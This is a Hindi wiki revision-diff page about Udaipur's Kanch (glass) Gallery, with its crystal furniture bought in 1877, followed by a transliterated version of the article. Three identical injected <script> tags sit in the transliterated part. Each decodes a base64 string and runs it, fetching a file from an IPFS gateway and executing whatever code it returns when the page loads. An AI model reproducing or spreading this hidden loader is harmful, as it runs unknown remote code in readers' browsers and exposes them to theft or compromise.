Difference between revisions of "काँच गैलरी उदयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{राजस्थान के पर्यटन स्थल}}" to "{{राजस्थान}}")
 
(6 intermediate revisions by 3 users not shown)
Line 1: Line 1:
उदयपुर की काँच गैलेरी धन के अपव्‍यय को दर्शाती है। [[उदयपुर]] के [[राणा सज्‍जन सिंह]] ने 1877 ई. में [[इंग्‍लैण्‍ड]] की एफ. एंड. सी. ओसलर एण्‍ड कंपनी से काँच के सामानों की ख़रीददारी की थी। इन सामानों में काँच की कुर्सी, बेड, सोफ़ा, डिनर सेट आदि शामिल था। इनके बाद के शासकों ने इन सामानों को सुरक्षित रखा। अब इन सामानों को फ़तह प्रकाश भवन के दरबार हॉल में पर्यटकों को देखने के लिए रखा गया है।
+
*[[उदयपुर]] [[राजस्थान]] का एक ख़ूबसूरत शहर है।
[[Category:राजस्थान]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
*काँच गैलरी [[उदयपुर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है।
==सम्बंधित लिंक==
+
*काँच गैलरी के सामानों में काँच की कुर्सी, बेड, सोफ़ा, डिनर सेट आदि शामिल था।  
{{राजस्थान}}
+
*इनके बाद के शासकों ने इन सामानों को सुरक्षित रखा।  
 +
*अब इन सामानों को फ़तह प्रकाश भवन के दरबार हॉल में पर्यटकों को देखने के लिए रखा गया है।
 +
{{प्रचार}}
 +
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक=प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
 +
 
 +
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:उदयपुर]][[Category:उदयपुर_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__

Latest revision as of 06:05, 30 April 2011

  • udayapur rajasthan ka ek khoobasoorat shahar hai.
  • kaanch gailari udayapur paryatan ka sabase akarshak sthal mana jata hai.
  • kaanch gailari ke samanoan mean kaanch ki kursi, bed, sofa, dinar set adi shamil tha.
  • inake bad ke shasakoan ne in samanoan ko surakshit rakha.
  • ab in samanoan ko fatah prakash bhavan ke darabar h aaul mean paryatakoan ko dekhane ke lie rakha gaya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>